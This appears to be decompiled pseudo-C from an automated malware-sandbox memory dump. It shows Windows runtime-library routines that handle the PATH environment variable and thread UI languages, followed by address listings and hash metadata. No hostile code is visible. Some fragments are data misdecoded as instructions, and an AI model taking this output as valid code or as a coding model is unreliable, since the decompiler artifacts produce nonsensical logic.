													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0115F3E0(_t323, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t323 = _t323 + (_t270 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t323 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx =  *0x120575c;
													__eflags = __ebx - 0x120575c;
													if(__ebx != 0x120575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0115F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x120575c;
														} while (__ebx != 0x120575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1208478 & 0x0000ffff = E0115F3E0(__edi,  *0x120847c,  *0x1208478 & 0x0000ffff);
													__eax =  *0x1208478 & 0x0000ffff;
													__eax = ( *0x1208478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1206e58 & 0x0000ffff = E0115F3E0(__edi,  *0x1206e5c,  *0x1206e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1206e58 & 0x0000ffff;
													__eax = ( *0x1206e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t310 = _v32;
													L29:
													_t285 = _t285 + 4;
													__eflags = _t285;
													_v56 = _t285;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t321 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01142935))) {
							case 0:
								__ax =  *0x1208488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t310 =  &_v64;
								_v80 = E01142E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1208480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1208480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0112EEF0(0x12079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0112EB70(__ecx, 0x12079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1207b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01134620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0112EB70(__ecx, 0x12079a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t336;
										_pop(_t282);
										return E0115B640(_t219, _t282, _v8 ^ _t336, _t310, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t310 =  &_v36;
									_t279 = E01142E3E(_t277,  &_v36);
									_t290 = _v36;
									_v76 = _t279;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x1205764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1208478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1208478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1206e58 & 0x0000ffff;
								__eax = ( *0x1206e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t310 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t295 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("adc al, 0x1");
					asm("o16 sub [ecx+eax], dl");
					asm("loopne 0x29");
					asm("adc al, 0x1");
					asm("adc al, 0x1");
					_t331 = _t328 + 1;
					 *((intOrPtr*)(_t295 + _t244)) =  *((intOrPtr*)(_t295 + _t244)) - _t310;
					_pop(_t286);
					asm("sbb [ecx], al");
					_t246 = _t340;
					_t342 = _t244 + 0x1f011426;
					 *((intOrPtr*)(_t295 + _t246)) =  *((intOrPtr*)(_t295 + _t246)) - _t310;
					_t247 = _t246 ^ 0x0201185b;
					 *((intOrPtr*)(_t295 + _t247)) =  *((intOrPtr*)(_t295 + _t247)) - _t310;
					 *_t247 =  *_t247 - 0x14;
					asm("daa");
					asm("adc al, 0x1");
					_push(ds);
					 *((intOrPtr*)(_t295 + _t247)) =  *((intOrPtr*)(_t295 + _t247)) - _t310;
					_t333 = _t328 + 1 + _t331 - 1;
					 *((intOrPtr*)(_t295 + _t247)) =  *((intOrPtr*)(_t295 + _t247)) - _t310;
					asm("daa");
					asm("adc al, 0x1");
					asm("fcomp dword [ebx+0x18]");
					 *((intOrPtr*)(_t247 +  &_a1546912016)) =  *((intOrPtr*)(_t247 +  &_a1546912016)) + _t328 + 1 + _t331 - 1;
					asm("sbb [ecx], al");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x11eff00);
					E0116D08C(_t286, _t323, _t333);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t287 = _a12;
					__eflags = _t287;
					if(_t287 == 0) {
						_t250 = 0xc0000100;
					} else {
						_v8 = 0;
						_t334 = 0xc0000100;
						_v52 = 0xc0000100;
						_t252 = 4;
						while(1) {
							_v40 = _t252;
							__eflags = _t252;
							if(_t252 == 0) {
								break;
							}
							_t300 = _t252 * 0xc;
							_v48 = _t300;
							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0x10f1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t267 = E0115E5C0(_a8,  *((intOrPtr*)(_t300 + 0x10f1668)), _t287);
									_t342 = _t342 + 0xc;
									__eflags = _t267;
									if(__eflags == 0) {
										_t334 = E011951BE(_t287,  *((intOrPtr*)(_v48 + 0x10f166c)), _a16, _t324, _t334, __eflags, _a20, _a24);
										_v52 = _t334;
										break;
									} else {
										_t252 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t252 = _t252 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t334;
						__eflags = _t334;
						if(_t334 < 0) {
							__eflags = _t334 - 0xc0000100;
							if(_t334 == 0xc0000100) {
								_t296 = _a4;
								__eflags = _t296;
								if(_t296 != 0) {
									_v36 = _t296;
									__eflags =  *_t296 - _t324;
									if( *_t296 == _t324) {
										_t334 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t254 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t254 + 0x48)) - _t296;
										if( *((intOrPtr*)(_t254 + 0x48)) == _t296) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t334 = E01142AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
												_v32 = _t334;
												__eflags = _t334 - 0xc0000100;
												if(_t334 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t296 = _v36;
													goto L75;
												}
											} else {
												_t257 = E01126600( *(_t312 + 0x1c));
												__eflags = _t257;
												if(_t257 != 0) {
													goto L106;
												} else {
													_t296 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t334 = E01142C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t334;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0112EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t334 = _a24;
									_t264 = E01142AE4( &_v36, _a8, _t287, _a16, _a20, _t334);
									_v32 = _t264;
									__eflags = _t264 - 0xc0000100;
									if(_t264 == 0xc0000100) {
										_v32 = E01142C50(_v36, _a8, _t287, _a16, _a20, _t334, 1);
									}
									_v8 = _t324;
									E01142ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t250 = _t334;
					}
					L70:
					return E0116D0D1(_t250);
				}
				L108:
			}





















































                                                      0x01142584
                                                      0x01142586
                                                      0x01142590
                                                      0x01142596
                                                      0x01142597
                                                      0x01142598
                                                      0x01142599
                                                      0x0114259e
                                                      0x011425a4
                                                      0x011425a9
                                                      0x011425ac
                                                      0x011425ae
                                                      0x011425b1
                                                      0x011425b2
                                                      0x011425b5
                                                      0x011425b8
                                                      0x011425bb
                                                      0x011425bc
                                                      0x011425bf
                                                      0x011425c2
                                                      0x011425c5
                                                      0x011425c6
                                                      0x011425cb
                                                      0x011425ce
                                                      0x011425d8
                                                      0x011425dd
                                                      0x011425de
                                                      0x011425e1
                                                      0x011425e3
                                                      0x011425e9
                                                      0x011426da
                                                      0x011426da
                                                      0x011426dd
                                                      0x011426e2
                                                      0x01185b56
                                                      0x00000000
                                                      0x011426e8
                                                      0x011426f9
                                                      0x011426fb
                                                      0x011426fe
                                                      0x01142700
                                                      0x01185b60
                                                      0x00000000
                                                      0x01142706
                                                      0x01142706
                                                      0x0114270a
                                                      0x0114270a
                                                      0x0114270d
                                                      0x01142713
                                                      0x01142716
                                                      0x01142718
                                                      0x0114271c
                                                      0x0114271e
                                                      0x01185b6c
                                                      0x01185b6f
                                                      0x01185b7f
                                                      0x01185b89
                                                      0x01185b8e
                                                      0x01185b93
                                                      0x01185b96
                                                      0x01185b9c
                                                      0x01185ba0
                                                      0x01185ba3
                                                      0x01185bab
                                                      0x01185bb0
                                                      0x01185bb3
                                                      0x01185bb3
                                                      0x01185ba3
                                                      0x01142724
                                                      0x01142726
                                                      0x01142729
                                                      0x0114272c
                                                      0x0114279d
                                                      0x0114279d
                                                      0x011427a0
                                                      0x011427a2
                                                      0x00000000
                                                      0x0114272e
                                                      0x0114272e
                                                      0x01142731
                                                      0x01142734
                                                      0x01142734
                                                      0x01142736
                                                      0x01185bc1
                                                      0x01185bc1
                                                      0x01185bc4
                                                      0x00000000
                                                      0x01185bca
                                                      0x01185bca
                                                      0x01185bcd
                                                      0x00000000
                                                      0x01185bd3
                                                      0x00000000
                                                      0x01185bd3
                                                      0x01185bcd
                                                      0x0114273c
                                                      0x0114273c
                                                      0x01142742
                                                      0x01142747
                                                      0x0114274a
                                                      0x0114274d
                                                      0x01142750
                                                      0x00000000
                                                      0x01142756
                                                      0x01142756
                                                      0x00000000
                                                      0x01142902
                                                      0x01142908
                                                      0x0114290b
                                                      0x00000000
                                                      0x01142911
                                                      0x0114291c
                                                      0x01142921
                                                      0x00000000
                                                      0x01142921
                                                      0x00000000
                                                      0x00000000
                                                      0x01142880
                                                      0x01142887
                                                      0x0114288c
                                                      0x00000000
                                                      0x00000000
                                                      0x01142805
                                                      0x0114280a
                                                      0x01142814
                                                      0x01142816
                                                      0x00000000
                                                      0x00000000
                                                      0x0114281e
                                                      0x01142821
                                                      0x01142823
                                                      0x00000000
                                                      0x01142829
                                                      0x01142829
                                                      0x01142831
                                                      0x0114283c
                                                      0x0114283e
                                                      0x00000000
                                                      0x0114283e
                                                      0x00000000
                                                      0x00000000
                                                      0x0114284e
                                                      0x01142850
                                                      0x01142851
                                                      0x01142854
                                                      0x01142857
                                                      0x0114285a
                                                      0x0114285c
                                                      0x0114285d
                                                      0x00000000
                                                      0x00000000
                                                      0x0114275d
                                                      0x01142761
                                                      0x00000000
                                                      0x01142767
                                                      0x0114276e
                                                      0x01142773
                                                      0x01142773
                                                      0x01142776
                                                      0x01142778
                                                      0x0114277e
                                                      0x0114277e
                                                      0x01142781
                                                      0x01142781
                                                      0x01142783
                                                      0x01142784
                                                      0x00000000
                                                      0x00000000
                                                      0x01185bd8
                                                      0x01185bde
                                                      0x01185be4
                                                      0x01185be6
                                                      0x01185be8
                                                      0x01185be9
                                                      0x01185bee
                                                      0x01185bf8
                                                      0x01185bff
                                                      0x01185c01
                                                      0x01185c04
                                                      0x01185c07
                                                      0x01185c0b
                                                      0x01185c0d
                                                      0x01185c0d
                                                      0x01185c15
                                                      0x01185c18
                                                      0x01185c1b
                                                      0x01185c1b
                                                      0x01185c1e
                                                      0x00000000
                                                      0x00000000
                                                      0x011428c3
                                                      0x011428c8
                                                      0x011428d2
                                                      0x011428d4
                                                      0x011428d8
                                                      0x011428db
                                                      0x01185c26
                                                      0x01185c28
                                                      0x01185c2d
                                                      0x01185c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x01185c34
                                                      0x01185c36
                                                      0x01185c49
                                                      0x01185c4e
                                                      0x01185c54
                                                      0x01185c5b
                                                      0x01185c5d
                                                      0x01185c60
                                                      0x01142788
                                                      0x01142788
                                                      0x0114278b
                                                      0x0114278e
                                                      0x0114278e
                                                      0x0114278e
                                                      0x01142791
                                                      0x00000000
                                                      0x00000000
                                                      0x01142756
                                                      0x01142750
                                                      0x00000000
                                                      0x01142794
                                                      0x01142794
                                                      0x01142795
                                                      0x01142798
                                                      0x01142798
                                                      0x00000000
                                                      0x01142734
                                                      0x0114272c
                                                      0x01142700
                                                      0x011425ef
                                                      0x011425ef
                                                      0x011425ef
                                                      0x011425f2
                                                      0x011425f8
                                                      0x00000000
                                                      0x00000000
                                                      0x011425fe
                                                      0x00000000
                                                      0x011428e6
                                                      0x011428ec
                                                      0x011428ef
                                                      0x011428f5
                                                      0x011428f8
                                                      0x011428f8
                                                      0x00000000
                                                      0x011428f8
                                                      0x00000000
                                                      0x00000000
                                                      0x01142866
                                                      0x01142866
                                                      0x01142876
                                                      0x01142879
                                                      0x00000000
                                                      0x00000000
                                                      0x011427e0
                                                      0x011427e7
                                                      0x011427e9
                                                      0x011427eb
                                                      0x01185afd
                                                      0x00000000
                                                      0x01185afd
                                                      0x00000000
                                                      0x00000000
                                                      0x01142633
                                                      0x01142638
                                                      0x0114263b
                                                      0x0114263c
                                                      0x0114263e
                                                      0x01142640
                                                      0x01142642
                                                      0x01142647
                                                      0x01142649
                                                      0x0114264e
                                                      0x01142650
                                                      0x01142653
                                                      0x01142659
                                                      0x011426a2
                                                      0x011426a7
                                                      0x011426ac
                                                      0x011426b2
                                                      0x01185b11
                                                      0x01185b15
                                                      0x01185b17
                                                      0x00000000
                                                      0x011426b8
                                                      0x011426b8
                                                      0x011426ba
                                                      0x011427a6
                                                      0x011427a6
                                                      0x011427a9
                                                      0x011427ab
                                                      0x011427b9
                                                      0x011427b9
                                                      0x011427be
                                                      0x011427c1
                                                      0x011427c3
                                                      0x011427c5
                                                      0x011427c7
                                                      0x01185c74
                                                      0x01185c79
                                                      0x01185c79
                                                      0x011427c7
                                                      0x00000000
                                                      0x011426c0
                                                      0x011426c0
                                                      0x011426c3
                                                      0x011426c6
                                                      0x011426c6
                                                      0x011426c9
                                                      0x011426c9
                                                      0x00000000
                                                      0x011426c9
                                                      0x011426ba
                                                      0x0114265b
                                                      0x0114265b
                                                      0x0114265e
                                                      0x01142667
                                                      0x0114266d
                                                      0x01142677
                                                      0x0114267c
                                                      0x0114267f
                                                      0x01142681
                                                      0x01185b49
                                                      0x01185b4e
                                                      0x011427cd
                                                      0x011427d0
                                                      0x011427d1
                                                      0x011427d2
                                                      0x011427d4
                                                      0x011427dd
                                                      0x01142687
                                                      0x01142687
                                                      0x0114268a
                                                      0x0114268b
                                                      0x0114268e
                                                      0x0114268f
                                                      0x01142691
                                                      0x01142696
                                                      0x01142698
                                                      0x0114269d
                                                      0x0114269f
                                                      0x00000000
                                                      0x0114269f
                                                      0x01142681
                                                      0x00000000
                                                      0x00000000
                                                      0x01142846
                                                      0x00000000
                                                      0x00000000
                                                      0x01142605
                                                      0x0114260a
                                                      0x0114260c
                                                      0x01142611
                                                      0x01142616
                                                      0x01142619
                                                      0x01142619
                                                      0x0114261e
                                                      0x00000000
                                                      0x01142624
                                                      0x01142627
                                                      0x01142627
                                                      0x00000000
                                                      0x00000000
                                                      0x01185b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x01142894
                                                      0x0114289b
                                                      0x0114289d
                                                      0x011428a1
                                                      0x01185b2b
                                                      0x01185b2e
                                                      0x01185b2e
                                                      0x011428a7
                                                      0x011428a9
                                                      0x01185b04
                                                      0x01185b09
                                                      0x01185b09
                                                      0x01185b09
                                                      0x00000000
                                                      0x00000000
                                                      0x01185b35
                                                      0x01185b3c
                                                      0x011428fb
                                                      0x011428fb
                                                      0x011426cc
                                                      0x011426cc
                                                      0x011426d0
                                                      0x00000000
                                                      0x011426d2
                                                      0x011426d2
                                                      0x00000000
                                                      0x011426d2
                                                      0x00000000
                                                      0x00000000
                                                      0x011425fe
                                                      0x0114292d
                                                      0x0114292f
                                                      0x01142930
                                                      0x01142935
                                                      0x01142937
                                                      0x01142939
                                                      0x0114293d
                                                      0x0114293f
                                                      0x01142941
                                                      0x01142945
                                                      0x01142946
                                                      0x0114294e
                                                      0x0114294f
                                                      0x01142951
                                                      0x01142951
                                                      0x01142952
                                                      0x01142955
                                                      0x0114295a
                                                      0x0114295d
                                                      0x01142962
                                                      0x01142963
                                                      0x01142965
                                                      0x01142966
                                                      0x01142969
                                                      0x0114296a
                                                      0x0114296e
                                                      0x0114296f
                                                      0x01142971
                                                      0x01142974
                                                      0x0114297b
                                                      0x0114297d
                                                      0x0114297e
                                                      0x0114297f
                                                      0x01142980
                                                      0x01142981
                                                      0x01142982
                                                      0x01142983
                                                      0x01142984
                                                      0x01142985
                                                      0x01142986
                                                      0x01142987
                                                      0x01142988
                                                      0x01142989
                                                      0x0114298a
                                                      0x0114298b
                                                      0x0114298c
                                                      0x0114298d
                                                      0x0114298e
                                                      0x0114298f
                                                      0x01142990
                                                      0x01142992
                                                      0x01142997
                                                      0x011429a3
                                                      0x011429a6
                                                      0x011429ab
                                                      0x011429ad
                                                      0x011429b0
                                                      0x011429b2
                                                      0x01185c80
                                                      0x011429b8
                                                      0x011429b8
                                                      0x011429bb
                                                      0x011429c0
                                                      0x011429c5
                                                      0x011429c6
                                                      0x011429c6
                                                      0x011429c9
                                                      0x011429cb
                                                      0x00000000
                                                      0x00000000
                                                      0x011429cd
                                                      0x011429d0
                                                      0x011429d9
                                                      0x011429db
                                                      0x011429dd
                                                      0x01142a7f
                                                      0x01142a84
                                                      0x01142a87
                                                      0x01142a89
                                                      0x01185ca1
                                                      0x01185ca3
                                                      0x00000000
                                                      0x01142a8f
                                                      0x01142a8f
                                                      0x00000000
                                                      0x01142a8f
                                                      0x00000000
                                                      0x011429e3
                                                      0x011429e3
                                                      0x011429e3
                                                      0x00000000
                                                      0x011429e3
                                                      0x011429dd
                                                      0x00000000
                                                      0x011429db
                                                      0x011429e6
                                                      0x011429e9
                                                      0x011429eb
                                                      0x011429ed
                                                      0x011429f3
                                                      0x011429f5
                                                      0x011429f8
                                                      0x011429fa
                                                      0x01142a97
                                                      0x01142a9a
                                                      0x01142a9d
                                                      0x01142add
                                                      0x00000000
                                                      0x01142a9f
                                                      0x01142aa2
                                                      0x01142aa5
                                                      0x01142aa8
                                                      0x01142aab
                                                      0x01185cab
                                                      0x01185caf
                                                      0x01185cc5
                                                      0x01185cda
                                                      0x01185cdc
                                                      0x01185cdf
                                                      0x01185ce5
                                                      0x00000000
                                                      0x01185ceb
                                                      0x01185ced
                                                      0x01185cee
                                                      0x00000000
                                                      0x01185cee
                                                      0x01185cb1
                                                      0x01185cb4
                                                      0x01185cb9
                                                      0x01185cbb
                                                      0x00000000
                                                      0x01185cbd
                                                      0x01185cbd
                                                      0x00000000
                                                      0x01185cbd
                                                      0x01185cbb
                                                      0x01142ab1
                                                      0x01142ab1
                                                      0x01142ac4
                                                      0x01142ac6
                                                      0x01142ac6
                                                      0x00000000
                                                      0x01142ac6
                                                      0x01142aab
                                                      0x00000000
                                                      0x01142a00
                                                      0x01142a09
                                                      0x01142a0e
                                                      0x01142a21
                                                      0x01142a24
                                                      0x01142a35
                                                      0x01142a3a
                                                      0x01142a3d
                                                      0x01142a42
                                                      0x01142a59
                                                      0x01142a59
                                                      0x01142a5c
                                                      0x01142a5f
                                                      0x01142a5f
                                                      0x011429fa
                                                      0x011429f3
                                                      0x01142a64
                                                      0x01142a64
                                                      0x01142a6b
                                                      0x01142a6b
                                                      0x01142a6d
                                                      0x01142a72
                                                      0x01142a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: 30d4151814a853986ae48069f107b04be08e4b6da5576a5f21ae33915b38e732
                                                      • Instruction ID: 9f1b3329d39d3414da17fd9699e81f50f5b4f35d77c7c1dd2c2ca2136922dd00
                                                      • Opcode Fuzzy Hash: 30d4151814a853986ae48069f107b04be08e4b6da5576a5f21ae33915b38e732
                                                      • Instruction Fuzzy Hash: CBC1B275E00619DFDB2DDF99E880BAEBBB1FF58B44F054029F901AB250D734A981CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E0114FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0112EEF0(0x1207b60);
					_t134 =  *0x1207b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1207b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1207b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01126D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E011276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E011B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0111B150();
													}
													_t116 = E011B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E011275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1208638; // 0x0
																	_t122 = L011238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E011276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E011276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0114FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
